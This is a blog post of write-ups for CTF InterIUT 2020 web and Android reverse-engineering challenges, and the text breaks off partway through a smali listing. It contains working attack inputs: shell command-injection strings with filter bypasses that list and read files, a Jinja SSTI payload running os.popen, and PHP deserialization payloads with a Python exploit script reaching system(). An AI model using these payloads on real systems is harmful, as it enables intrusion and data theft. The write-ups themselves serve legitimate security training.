---
title: "CTF InterIUT 2020 WriteUps"
date: 2020-11-29
draft: false
toc: true
images:
tags:
  - CTF
  - writeups
---


## CTF InterIUT

The CTF was during the week end of the 27-29 November 2020.

Website : https://ctf.hack2g2.fr/

Twitter : https://twitter.com/CTF_Inter_IUT

I focus on the WEB and Reverse category.

## WEB

### Skull Partie 1

The website :

{{< image src="../../posts-img/ctf-interiut/skull.png" alt="website" position="center" style="border-radius: 2px;" >}}

Looking at /robots.txt

```
User-Agent: *
Disallow: /admin_login.php
Disallow: /admin_logout.php
Disallow: /admin_site.php
Disallow: /you_will_never_find_the_first_flag.txt
```

Check /you_will_never_find_the_first_flag.txt

H2G2{Skull1_Y0u_fOunD_m3_n1cE_bUt_th3re_iS_an_OthEr_st3P}

### Impossible vous pensez ?

Source code :

```php
<!doctype html>
<html>
<head>
    <title>Impossible mec</title>
    <meta charset="utf-8">
</head>
<body>
<?php
    # Personne ne peut trouer cette sécurité ! Tiens, je te donne même le code source. Bonne chance hein ;)

    require_once("include/config.php");

    highlight_file(__FILE__);

    function RecuperationDuMotDePasse(){
        echo "Mon mot de passe est : <b>" . file_get_contents("/flag") . "</b>";
    }

    if(isset($_GET["code"]) && !empty($_GET["code"])){
        $code = $_GET["code"];

        # Parce que faut pas déconner non plus !
        $code = filtrage($code);

        if(strpos($code, "RecuperationDuMotDePasse") === false){
            call_user_func($code);
        } else {
            echo "Ahaha je le savais. Im-po-ssible j'ai dis.";
        }
    }
?>
</body>
</html>
```

https://www.php.net/manual/en/function.call-user-func.php

Example :

```php
php > function toto() {
php { echo "toto";
php { }
php > toto();
toto
php > call_user_func("toto");
toto
```

The bypass :

```php
php > call_user_func("TOTO");
toto
```

Go to impossible.interiut.ctf/?code=RECUPERATIONDUMOTDEPASSE

H2G2{pHp_15_7he_B3st}

### DédéOS 1

Website :

{{< image src="../../posts-img/ctf-interiut/dedeos.png" alt="website" position="center" style="border-radius: 2px;" >}}

Command injection ? YES !

We can assume that the command looks like this :

```
$ ping <hostname>
```

Bash :

```
$ not_working_command || this_command_will_be_executed
$ not_working_command && this_command_will_be_NOT_executed

$ ping
ping: usage error: Destination address required
$ ping || ls
Desktop ...
```

After some try, this works :

{{< image src="../../posts-img/ctf-interiut/command_exec.png" alt="command_exec" position="center" style="border-radius: 2px;" >}}

```sh
|| ls -al secret;
|| ls -al secret/the;
|| ls -al secret/the/flag;
|| ls -al secret/the/flag/is;
|| ls -al secret/the/flag/is/here;
|| cat secret/the/flag/is/here/.flag;
```

H2G2{y3aH_b4sH_yoU_knOW}

### DédéOS 2

This challenge was the same but with more filter.

We can't use spaces anymore.

```
||ls; 		-> OK
||ls -al;	-> Attaque malicieuse détectée.
```

So, I try to find a space in environment variable to do somethings like this :

```
Imagine ${SPACE} is " ".
||ls${SPACE}-al;
```

But I did not find any variable that contains a space.

So let's create a variable with a space in it.

Example on my computer :

```sh
$ ps
    PID TTY          TIME CMD
   2995 pts/1    00:00:00 bash
   3169 pts/1    00:00:02 fish
  12598 pts/1    00:00:00 bash
  21911 pts/1    00:00:00 ps
$ OUT=$(ps)
$ echo "->${OUT:7:1}<-"		# char between PID & TTY
-> <-
```

Let's hack !

```
||ps;
PID   USER     TIME  COMMAND
    1 root      0:00 httpd -D FOREGROUND
    6 apache    0:00 httpd -D FOREGROUND
    7 apache    0:00 httpd -D FOREGROUND
    8 apache    0:00 httpd -D FOREGROUND
    9 apache    0:00 httpd -D FOREGROUND
   10 apache    0:00 httpd -D FOREGROUND
   11 apache    0:00 httpd -D FOREGROUND
   95 apache    0:00 sh -c ping -c 1 ||ps; > /dev/null && echo 'Cible atteinte' || echo 'Cible non atteignable'
   97 apache    0:00 ps
Cible atteinte

||OUT=$(ps);ls${OUT:4:1}-al;
total 20
drwxr-xr-x    1 apache   apache        4096 Nov 28 09:43 .
drwxr-xr-x    1 root     root          4096 Nov 28 05:01 ..
-rw-r--r--    1 apache   apache           0 Nov 28 09:44 1
drwxr-xr-x    3 apache   apache        4096 Nov 27 14:24 flag
-rw-r--r--    1 apache   apache        1417 Nov 27 14:24 index.php
-rw-r--r--    1 apache   apache         778 Nov 27 14:24 style.css
Cible atteinte

||OUT=$(ps);ls${OUT:4:1}-al${OUT:4:1}flag/it/;
...
||OUT=$(ps);ls${OUT:4:1}-al${OUT:4:1}flag/it/is/;
...
||OUT=$(ps);ls${OUT:4:1}-al${OUT:4:1}flag/it/is/soon/;
...
||OUT=$(ps);cat${OUT:4:1}flag/it/is/soon/here/flag.md;
H2G2{w0w_4gaIN??_w1ll_b3_h4rdER_n3xT_T1me}
```

### DédéOS 3

Ok now we cannot use space and ";".

The command in DédéOS 2 was :

```
$ sh -c ping -c 1 %INPUT% >/dev/null && echo 'Cible atteinte' || echo 'Cible non atteignable'

Interesting part only :
$ sh -c ping -c 1 %INPUT% >/dev/null
```

I think the command is still the same.

Let's find the correct payload

```
$ sh -c ping -c 1 ||ls >/dev/null
We cannot see anything

$ sh -c ping -c 1 ||ls# >/dev/null
I try this but didn't work

$ sh -c ping -c 1 ||ls|| >/dev/null
Working !!!
```

Let's find the flag :

```
||ls||
...
||OUT=$(ps)&&ls${OUT:4:1}-al||
...
||OUT=$(ps)&&ls${OUT:4:1}-al${OUT:4:1}.secret||
...
||OUT=$(ps)&&ls${OUT:4:1}-al${OUT:4:1}.secret/2||
...
||OUT=$(ps)&&ls${OUT:4:1}-al${OUT:4:1}.secret/2/1||
...
||OUT=$(ps)&&ls${OUT:4:1}-al${OUT:4:1}.secret/2/1/3||
...
||OUT=$(ps)&&cat${OUT:4:1}.secret/2/1/3/flag.txt||
H2G2{Y0u_4r3_s0_g0oD_4t_h4ck1NG!}
```

### Céréales en ligne

The goal is to access the admin panel.

In the description of the challenge we have a hint about cookies.

Let's check it !

```
Cookie: session=Tzo0OiJVc2VyIjo2OntzOjI6ImlkIjtpOjQyO3M6NzoiaXNBZG1pbiI7YjowO3M6NjoiYmFza2V0IjtOO3M6OToibGFzdExvZ2luIjtzOjk6IlVuZGVmaW5lZCI7czoxMToicHJlZmVyZW5jZXMiO3M6NjQ6IkdEUFJfQ09NUExJQU5DRT1GYWxzZTtDT05TQ0VOVF9LRVlMT0dHRVI9VHJ1ZTtJX0FNX0JBVE1BTj1GYWxzZTsiO3M6MTA6ImdvQm91c3NvbGUiO2I6MTt9
```

Base64 ?? :)

```
O:4:"User":6:{s:2:"id";i:42;s:7:"isAdmin";b:0;s:6:"basket";N;s:9:"lastLogin";s:9:"Undefined";s:11:"preferences";s:64:"GDPR_COMPLIANCE=False;CONSCENT_KEYLOGGER=True;I_AM_BATMAN=False;";s:10:"goBoussole";b:1;}
```

PHP Serialization : https://www.php.net/manual/en/language.oop5.serialization.php

Let's change :

```
"isAdmin";b:0
"isAdmin";b:1
```

Go to the admin panel :

{{< image src="../../posts-img/ctf-interiut/42.png" alt="admin panel" position="center" style="border-radius: 2px;" >}}

Ok we need to change the ID too :

```
"id";i:42
"id";i:0
```

And let's go !

H2G2{1_liKe_s3ri4LIsati0n!}


### Ninja name generator

We have a website which generate username with our input.

Example with "toto" :

{{< image src="../../posts-img/ctf-interiut/indextoto.png" alt="index" position="center" style="border-radius: 2px;" >}}

Ninja -> Jinja -> Server Side Template Injection (SSTI)

Let's try with "{{7*7}}"

{{< image src="../../posts-img/ctf-interiut/49.png" alt="index" position="center" style="border-radius: 2px;" >}}

The code is executed because we obtain 49.

Try with "{{config.items()}}"

We obtain

```
_items([('DEBUG', True), ('TESTING', False), ('PROPAGATE_EXCEPTIONS', None), ('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SECRET_KEY', None), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(days=31)), ('USE_X_SENDFILE', False), ('LOGGER_NAME', '__main__'), ('SERVER_NAME', None), ('APPLICATION_ROOT', None), ('SESSION_COOKIE_NAME', 'session'), ('SESSION_COOKIE_DOMAIN', None), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_HTTPONLY', True), ('SESSION_COOKIE_SECURE', False), ('MAX_CONTENT_LENGTH', None), ('SEND_FILE_MAX_AGE_DEFAULT', 43200), ('TRAP_BAD_REQUEST_ERRORS', False), ('TRAP_HTTP_EXCEPTIONS', False), ('PREFERRED_URL_SCHEME', 'http'), ('JSON_AS_ASCII', True), ('JSON_SORT_KEYS', True), ('JSONIFY_PRETTYPRINT_REGULAR', True), ('SUPER_SECRET_PATH', '/_5uPer_s3cret_')]) 
```

```
('SUPER_SECRET_PATH', '/_5uPer_s3cret_')

Let's go to /_5uPer_s3cret_ and we get the flag
```

H2G2{j1nJ4_1s_s3cure}

### La théourie des graphes

The website is a GraphQL panel, let's enumerate !

```
{__schema{types{name}}}

We get :

{
  "data": {
    "__schema": {
      "types": [
        {
          "name": "Query"
        },
        {
          "name": "String"
        },
        {
          "name": "ID"
        },
        {
          "name": "Course"
        },
        {
          "name": "Boolean"
        },
        {
          "name": "__Schema"
        },
        {
          "name": "__Type"
        },
        {
          "name": "__TypeKind"
        },
        {
          "name": "__Field"
        },
        {
          "name": "__InputValue"
        },
        {
          "name": "__EnumValue"
        },
        {
          "name": "__Directive"
        },
        {
          "name": "__DirectiveLocation"
        }
      ]
    }
  }
}
```

Introspection :

```
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

We get :

{
  "data": {
    "__schema": {
      "queryType": {
        "name": "Query"
      },
      "mutationType": null,
      "types": [
        {
          "kind": "OBJECT",
          "name": "Query",
          "description": null,
          "fields": [
            {
              "name": "Intro",
              "description": null,
              "args": [],
              "type": {
                "kind": "SCALAR",
                "name": "String",
                "ofType": null
              },
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "GetCourse",
              "description": null,
              "args": [
                {
                  "name": "id",
                  "description": null,
                  "type": {
                    "kind": "NON_NULL",
                    "name": null,
                    "ofType": {
                      "kind": "SCALAR",
                      "name": "ID",
                      "ofType": null
                    }
                  },
                  "defaultValue": null
                }
              ],
              "type": {
                "kind": "OBJECT",
                "name": "Course",
                "ofType": null
              },
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "GetAllCourses",
              "description": null,
              "args": [],
              "type": {
                "kind": "LIST",
                "name": null,
                "ofType": {
                  "kind": "OBJECT",
                  "name": "Course",
                  "ofType": null
                }
              },
              "isDeprecated": false,
              "deprecationReason": null
            }
          ],
          "inputFields": null,
          "interfaces": [],
          "enumValues": null,
          "possibleTypes": null
        },
        ...
```

The description of the challenge says that the flag is in the courses. Let's find it!

```
{GetAllCourses {
  id, title, content, published
}}

We get :

{
  "data": {
    "GetAllCourses": [
      {
        "id": "0",
        "title": "Cours 0",
        "content": "La théorie des graphes est la discipline mathématique et informatique qui étudie les graphes, lesquels sont des modèles abstraits de dessins de réseaux reliant des objets1. Ces modèles sont constitués par la donnée de sommets (aussi appelés nœuds ou points, en référence aux polyèdres), et d'arêtes (aussi appelées liens ou lignes) entre ces sommets ; ces arêtes sont parfois non-symétriques (les graphes sont alors dits orientés) et sont appelés des flèches. - Wikipedia",
        "published": true
      },
      {
        "id": "1",
        "title": "Cours 1",
        "content": "La théorie des graphes est la discipline mathématique et informatique qui étudie les graphes, lesquels sont des modèles abstraits de dessins de réseaux reliant des objets1. Ces modèles sont constitués par la donnée de sommets (aussi appelés nœuds ou points, en référence aux polyèdres), et d'arêtes (aussi appelées liens ou lignes) entre ces sommets ; ces arêtes sont parfois non-symétriques (les graphes sont alors dits orientés) et sont appelés des flèches. - Wikipedia",
        "published": true
      },
      {
        "id": "2",
        "title": "Cours 2",
        "content": "La théorie des graphes est la discipline mathématique et informatique qui étudie les graphes, lesquels sont des modèles abstraits de dessins de réseaux reliant des objets1. Ces modèles sont constitués par la donnée de sommets (aussi appelés nœuds ou points, en référence aux polyèdres), et d'arêtes (aussi appelées liens ou lignes) entre ces sommets ; ces arêtes sont parfois non-symétriques (les graphes sont alors dits orientés) et sont appelés des flèches. - Wikipedia",
        "published": true
      },
      {
        "id": "3",
        "title": "Cours 3",
        "content": "La théorie des graphes est la discipline mathématique et informatique qui étudie les graphes, lesquels sont des modèles abstraits de dessins de réseaux reliant des objets1. Ces modèles sont constitués par la donnée de sommets (aussi appelés nœuds ou points, en référence aux polyèdres), et d'arêtes (aussi appelées liens ou lignes) entre ces sommets ; ces arêtes sont parfois non-symétriques (les graphes sont alors dits orientés) et sont appelés des flèches. - Wikipedia",
        "published": true
      },
      ...
      {
        "id": "136",
        "title": "Cours 136",
        "content": "La théorie des graphes est la discipline mathématique et informatique qui étudie les graphes, lesquels sont des modèles abstraits de dessins de réseaux reliant des objets1. Ces modèles sont constitués par la donnée de sommets (aussi appelés nœuds ou points, en référence aux polyèdres), et d'arêtes (aussi appelées liens ou lignes) entre ces sommets ; ces arêtes sont parfois non-symétriques (les graphes sont alors dits orientés) et sont appelés des flèches. - Wikipedia",
        "published": true
      }
    ]
  }
}
```

The ID 69 was missing but I don't see it the first time so I try to bruteforce the id (maybe one was hidden).

This python script execute this query :

```
{
   GetCourse(id:"<id>") {
    id
    content
   }
}
```

```
#!/usr/bin/env python3
import requests


for i in range(1000):
    req = requests.get(f"http://theourie-des-graphes.interiut.ctf/graphql?query=%7B%0A%20%20%20GetCourse(id%3A%22{i}%22)%20%7B%0A%20%20%20%20id%0A%20%20%20%20content%0A%20%20%20%7D%0A%7D")
    print(f"ID: {i}")
    print(req.text)
    print("="*30)
```

Thanks to this script I found that the ID 69 was missing !

```
{
   GetCourse(id:"69") {
    id
    content
   }
}

http://theourie-des-graphes.interiut.ctf/secret_notes
```

Let's visit this URL :

H2G2{gr4phQl_1s_c0oL_riGHt?}

### MonSQL Injection 1

Here we have a new SQL langage in French named "MonSQL" :')

I create a traductor from regular SQL to "MonSQL".

```python
#!/usr/bin/env python3
import sys


traduction = {
    "select": "sélectionne",
    "from": "àpartirde",
    "where": "où",
    "insert": "insérer",
    "update": "metàjour",
    "delete": "supprime",
    "create": "créationde",
    "alter": "modifie",
    "drop": "jette",
    "into": "àlintérieur",
    "values": "valeurs",
    " on ": " lorsquelon ",
    "set": "définit",
    "database": "labasededonnée",
    "show": "montremoi",
    " tables": " lestables",
    " table": "latable",
}

if len(sys.argv) < 2:
    print(f"Usage: python3 {sys.argv[0]} <query>")
else:
    query = sys.argv[1].lower()
    for word in traduction:
        # print(f"{word} : {traduction[word]}")
        query = query.replace(word, traduction[word])
    print(query)
```

Example :

```
$ python3 traducteur.py "show tables;"
montremoi lestables;
```

{{< image src="../../posts-img/ctf-interiut/showtables.png" alt="website" position="center" style="border-radius: 2px;" >}}

```
sélectionne * àpartirde utilisateurs;

1	Amena	Davenport
2	Audra	Frank
3	Dennis	Bender
4	Fritz	Giles
5	Simone	Whitaker
6	Anne	Snyder
7	Herrod	Mays
8	Kyle	Dickson
9	Lacota	Wood
10	Denton	Alvarado
11	Adena	Potts
...

sélectionne * àpartirde reponses;

1	H2G2{j_3sper3_qu3_v0us_4v3z_tr0uv3_ca_f4cil3_?}
```

### Air CnC

BotNet Panel :

{{< image src="../../posts-img/ctf-interiut/botnet.png" alt="website" position="center" style="border-radius: 2px;" >}}

Send the command "toto", response :

```
With cmd=toto&submit=Send+command

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 10
Server: Werkzeug/1.0.1 Python/3.9.0
Date: Sun, 29 Nov 2020 16:47:14 GMT

cmd : toto
```

The web server is coded in python, Jinja SSTI again ?

```
cmd={{7*7}}&submit=Send+command

cmd : 49
```

:))))

After some googling about SSTI with Jinja I found this payload :

```
cmd={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}&submit=Send+command

cmd : app.py
requirements.txt
static
templates
```

Let's find the flag !

```
cmd={{config.__class__.__init__.__globals__['os'].popen('cat+/flag').read()}}&submit=Send+command

cmd : H2G2{v3ry_S3cuRed_P4n3l!}
```

### Skull partie 2

TODO

### : shrug :

Source code:

```php
<?php
// ¯\_(ツ)_/¯


class Boussole {
    public $order;

    public function __construct() {
        if(isset($_POST['b_order'])) {
            $this -> order = $_POST['b_order'];
        } else {
            $this -> order = "eau";
        }
    }

    public function __wakeup() {
	    echo $this -> kevin($this -> order);
    }

    public function kevin($order) {
        $drinks = ["eau", "moscow_mule", "dark_n_stormy", "mojito", "sex_on_the_beach", "duchesse"];
        if(in_array($order, $drinks)) {
            return "Votre " . $order . " est en préparation.";
        } else {
            eval($order);
        }
    }
}

$a = $_GET['dio'];
$b = $_GET['jotaro'];
$c = $_POST['stand'];

if(isset($a) && isset($b) && isset($c)) {
    if($c == "Hermit Purple") { 
	    unserialize($_GET['dio']);
    }
}
```

PHP Magic methods

```
__sleep()   call after  serialize()
__wakeup()  call after  unserialize()
```

I edit the code to make test on my computer.

```php
<?php

class Boussole {
    public $order;

    public function __construct($b_order) {
        $this -> order = $b_order;
    }

    public function __wakeup() {
        echo $this -> kevin($this -> order);
    }

    public function kevin($order) {
        $drinks = ["eau", "moscow_mule", "dark_n_stormy", "mojito", "sex_on_the_beach", "duchesse"];
        if(in_array($order, $drinks)) {
            return "Votre " . $order . " est en préparation.";
        } else {
            echo "eval('$order');" . PHP_EOL;
            echo "----" . PHP_EOL;
            eval($order);
        }
    }
}

$boussole = new Boussole("system('echo Hello world !');");
$ser = serialize($boussole);
echo "Serialize -> $ser" . PHP_EOL;
unserialize($ser);
```

```
$ php shrug.php 
Serialize -> O:8:"Boussole":1:{s:5:"order";s:29:"system('echo Hello world !');";}
eval('system('echo Hello world !');');
----
Hello world !
```

We can execute system command :)

Let's do it on the server now !

```
Serialize -> O:8:"Boussole":1:{s:5:"order";s:13:"system('ls');";}

$ python3 exploit.py
<code><span style="color: #000000">
<span style="color: #0000BB">
...
</span>
</code>b0e4c25d3de6860f7a396a8148a42fda.txt
index.php
```

exploit.py :

```
#!/usr/bin/env python3
import requests

data = {
    "stand": "Hermit Purple"
}

req = requests.post("http://shrug.interiut.ctf/?dio=O:8:\"Boussole\":1:{s:5:\"order\";s:51:\"system(\'cat b0e4c25d3de6860f7a396a8148a42fda.txt\');\";}&jotaro=1", data=data)

print(req.text)
```

Get the flag

```
Serialize -> O:8:"Boussole":1:{s:5:"order";s:51:"system('cat b0e4c25d3de6860f7a396a8148a42fda.txt');";}

$ python3 exploit.py
<code><span style="color: #000000">
<span style="color: #0000BB">
...
</span>
</code>H2G2{Uns3rial1z4tiOn_iS_eAsY_r1ght?}
```

## Reverse

### Reverse me 1

The challenge was about reversing an android app.

We have to download the application APK file.

After decompile it with MobSF we can see a password verification :

```java
public class NotFlag {
    public static boolean getFlag(String in) {
        if (in.equals("ENSIBS{" + "boussole" + "_" + "is_good_for_the" + "_" + "interiut" + "_" + "ctf" + "}")) {
            return true;
        }
        return false;
    }
}
```

ENSIBS{boussole_is_good_for_the_interiut_ctf}

### Reverse me 2

Another APK to reverse.

After looking to the strings I found 3 interestings things:

```
"google_api_key" : "AIzaSyDOV5tbZVMIMo-WAZ5Y3rLJWFk-poBgKec"
"google_crash_reporting_api_key" : "AIzaSyDOV5tbZVMIMo-WAZ5Y3rLJWFk-poBgKec"
"firebase_database_url" : "https://reverse-me-2.firebaseio.com"
```

Let's go to https://reverse-me-2.firebaseio.com/.json

H2G2{f1r3basE_iS_v3ry_s3cure}

### QuiPasse

The title name was about the keepass app (password storage).

In the strings of the app we can find :

"secret_key" : "B224589A65B8E5BF5C36ABF3DC48CFA2607044BEA72C796104087AEF576503BC"

In the code :

```java
    private String[] encryptedPasses = {"BS/MgnUEep/nCC1aAK/aB5mJAKfRGn3T03/sePM8nVv9nn36UZZvi+/bsqHnaKtc", "Rly34A8V98gY467cQy6JfLZa/PNjtEXyxdyGva6pScZmEtMKsaaHv88wxvKDB44OoSqO0HPcbUpvp8tD2rCSlw==", "U+HaCImq6DmIKc+9rzhf41tbcPuXg0UCrEGPdmzMBdFRMC/mbVg+ITC+zvkJZi4PO2dhIg0PcnSPIlSt1VJzWw==", "YIY1M4r5M9cy1EgmB9WGB6ULTopi+b7MuJKsl82JCLr+P6FAJhwr4XDxbTL6Qw2m", "1NJxkx1uM5X6feZaCWa0nluQwrc0NF4xo69I2Uw0aJ0au4o0KfrzUPpQynxQB+nU", "szQ1W/w93pvU4wk3WXMkLYG7tuUsP55f2r915PmOkHJI9LVuAXMEFKhS+7Vl/HllZx+Mb2ILzjDSW1xqvdPg/fwidsy+WWpHatPnDDEToy8="};
```

The app use AES with the secret_key to encrypt their passwords.

I edit the implemetation to decrypt the content of all the passwords.

```java
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.util.Base64;

public class Decrypt {
 
    public Decrypt() {
    }

    public static void main(String[] args) {
        Decrypt dec = new Decrypt();
        String[] encryptedPasses = {"BS/MgnUEep/nCC1aAK/aB5mJAKfRGn3T03/sePM8nVv9nn36UZZvi+/bsqHnaKtc", "Rly34A8V98gY467cQy6JfLZa/PNjtEXyxdyGva6pScZmEtMKsaaHv88wxvKDB44OoSqO0HPcbUpvp8tD2rCSlw==", "U+HaCImq6DmIKc+9rzhf41tbcPuXg0UCrEGPdmzMBdFRMC/mbVg+ITC+zvkJZi4PO2dhIg0PcnSPIlSt1VJzWw==", "YIY1M4r5M9cy1EgmB9WGB6ULTopi+b7MuJKsl82JCLr+P6FAJhwr4XDxbTL6Qw2m", "1NJxkx1uM5X6feZaCWa0nluQwrc0NF4xo69I2Uw0aJ0au4o0KfrzUPpQynxQB+nU", "szQ1W/w93pvU4wk3WXMkLYG7tuUsP55f2r915PmOkHJI9LVuAXMEFKhS+7Vl/HllZx+Mb2ILzjDSW1xqvdPg/fwidsy+WWpHatPnDDEToy8="};
        try {
            for (String pass : encryptedPasses) {
                byte[] cleartext = dec.decrypt(Base64.getDecoder().decode(pass.getBytes()));
                System.out.println(new String(cleartext, "UTF-8"));
            }
        } catch (Exception e) {
            System.err.println(e);
        }
    }

    public static byte[] hexStringToByteArray(String s) {
        int len = s.length();
        byte[] data = new byte[(len / 2)];
        for (int i = 0; i < len; i += 2) {
            data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
        }
        return data;
    }

    private byte[] decrypt(byte[] encrypted) throws Exception {
        SecretKeySpec skeySpec = new SecretKeySpec(Decrypt.hexStringToByteArray("B224589A65B8E5BF5C36ABF3DC48CFA2607044BEA72C796104087AEF576503BC"), "AES");
        Cipher cipher = Cipher.getInstance("AES");
        cipher.init(2, skeySpec);
        return cipher.doFinal(encrypted);
    }
}
```

Run it

```
$ javac Decrypt.java && java Decrypt
Gmail:jeanpierre56:123456:mail.google.com
Le site pref de ton daron:admin:hunter2:nephael.net
Le flag ?:yourteam:H2G2{r0n4n_L4CH3_C3TT3_APK_!}:ctf.hack2g2.fr
Github:JPdu56:motdepasse:github.com
Perso:jpp:jpp:secret.raclette.site
Auto promo oklm :pasdemotdelogin:pasdemotdepasse:song.entropy.land
```

### SMALI, un beau pays

The challenge was to decode this smali file :

```java
.class public Lctf/interiut/password_check/MainActivity;
.super Landroidx/appcompat/app/AppCompatActivity;
.source "MainActivity.java"


# instance fields
.field public button:Landroid/widget/Button;

.field public input:Landroid/widget/EditText;

.field public result:Landroid/widget/TextView;


# direct methods
.method public constructor <init>()V
    .locals 0

    .line 17
    invoke-direct {p0}, Landroidx/appcompat/app/AppCompatActivity;-><init>()V

    return-void
.end method


# virtual methods
.method public checkPassword(Ljava/lang/String;)Z
    .locals 11
    .param password, "password"    # Ljava/lang/String;

    .line 57
    const/16 v0, 0x11

    invoke-virtual {password, v0}, Ljava/lang/String;->substring(I)Ljava/lang/String;

    move-result-object v1

    .line 59
    .local v1, "a":Ljava/lang/String;
    const/4 v2, 0x0

    :try_start_0
    new-instance v3, Ljava/lang/String;

    invoke-static {}, Ljava/util/Base64;->getDecoder()Ljava/util/Base64$Decoder;

    move-result-object v4

    invoke-virtual {v4, v1}, Ljava/util/Base64$Decoder;->decode(Ljava/lang/String;)[B

    move-result-object v4

    invoke-direct {v3, v4}, Ljava/lang/String;-><init>([B)V

    .line 60
    .local v3, "b":Ljava/lang/String;
    const/4 v4, 0x7

    invoke-virtual {v3, v2, v4}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v5

    new-instance v6, Ljava/lang/String;

    invoke-static {}, Ljava/util/Base64;->getDecoder()Ljava/util/Base64$Decoder;

    move-result-object v7

    const-string v8, "RU5TSUJTew==" // ENSIBS{

    invoke-virtual {v7, v8}, Ljava/util/Base64$Decoder;->decode(Ljava/lang/String;)[B

    move-result-object v7

    invoke-direct {v6, v7}, Ljava/lang/String;-><init>([B)V

    invoke-virtual {v5, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v5

    if-eqz v5, :cond_0          // DONE

    .line 61
    const/16 v5, 0x8

    invoke-virtual {v3, v4, v5}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v4

    const/16 v6, 0x9

    const/16 v7, 0xa

    invoke-virtual {password, v6, v7}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v6

    invoke-virtual {v4, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v4

    if-eqz v4, :cond_0          // DONE

    .line 62
    const/16 v4, 0xe

    invoke-virtual {v3, v5, v4}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v6

    new-instance v8, Ljava/lang/String;

    invoke-static {}, Ljava/util/Base64;->getDecoder()Ljava/util/Base64$Decoder;

    move-result-object v9

    const-string v10, "bTRsaV8x" // m4li_1

    invoke-virtual {v9, v10}, Ljava/util/Base64$Decoder;->decode(Ljava/lang/String;)[B

    move-result-object v9

    invoke-direct {v8, v9}, Ljava/lang/String;-><init>([B)V

    invoke-virtual {v6, v8}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v6

    if-eqz v6, :cond_0 // DONE

    .line 63
    const/16 v6, 0xf

    invoke-virtual {v3, v4, v6}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v4

    const/16 v8, 0xb

    invoke-virtual {password, v7, v8}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v8

    invoke-virtual {v4, v8}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v4

    if-eqz v4, :cond_0  // DONE

    .line 64
    invoke-virtual {v3, v6, v0}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v4

    const-string v6, "_3"

    invoke-virtual {v4, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v4

    if-eqz v4, :cond_0 // DONE

    .line 65
    const/16 v4, 0x13

    invoke-virtual {v3, v0, v4}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v0

    invoke-virtual {password, v5, v7}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v5

    invoke-virtual {v0, v5}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v0

    if-eqz v0, :cond_0 // DONE

    .line 66
    const/16 v0, 0x15

    invoke-virtual {v3, v4, v0}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v0

    const-string v4, "Y}"

    invoke-virtual {v0, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v0
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    if-eqz v0, :cond_0

    .line 67
    const/4 v0, 0x1

    return v0

    .line 77
    .end local v3    # "b":Ljava/lang/String;
    :cond_0
    nop

    .line 79
    return v2

    .line 75
    :catch_0
    move-exception v0

    .line 76
    .local v0, "e":Ljava/lang/Exception;
    return v2
.end method

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 2
    .param password, "savedInstanceState"    # Landroid/os/Bundle;

    .line 25
    invoke-super {p0, password}, Landroidx/appcompat/app/AppCompatActivity;->onCreate(Landroid/os/Bundle;)V

    .line 26
    const v0, 0x7f0a001c

    invoke-virtual {p0, v0}, Lctf/interiut/password_check/MainActivity;->setContentView(I)V

    .line 28
    const v0, 0x7f0700a7

    invoke-virtual {p0, v0}, Lctf/interiut/password_check/MainActivity;->findViewById(I)Landroid/view/View;

    move-result-object v0

    check-cast v0, Landroid/widget/EditText;

    iput-object v0, p0, Lctf/interiut/password_check/MainActivity;->input:Landroid/widget/EditText;

    .line 29
    const v0, 0x7f070057

    invoke-virtual {p0, v0}, Lctf/interiut/password_check/MainActivity;->findViewById(I)Landroid/view/View;

    move-result-object v0

    check-cast v0, Landroid/widget/Button;

    iput-object v0, p0, Lctf/interiut/password_check/MainActivity;->button:Landroid/widget/Button;

    .line 30
    const v0, 0x7f0700b2

    invoke-virtual {p0, v0}, Lctf/interiut/password_check/MainActivity;->findViewById(I)Landroid/view/View;

    move-result-object v0

    check-cast v0, Landroid/widget/TextView;

    iput-object v0, p0, Lctf/interiut/password_check/MainActivity;->result:Landroid/widget/TextView;

    .line 32
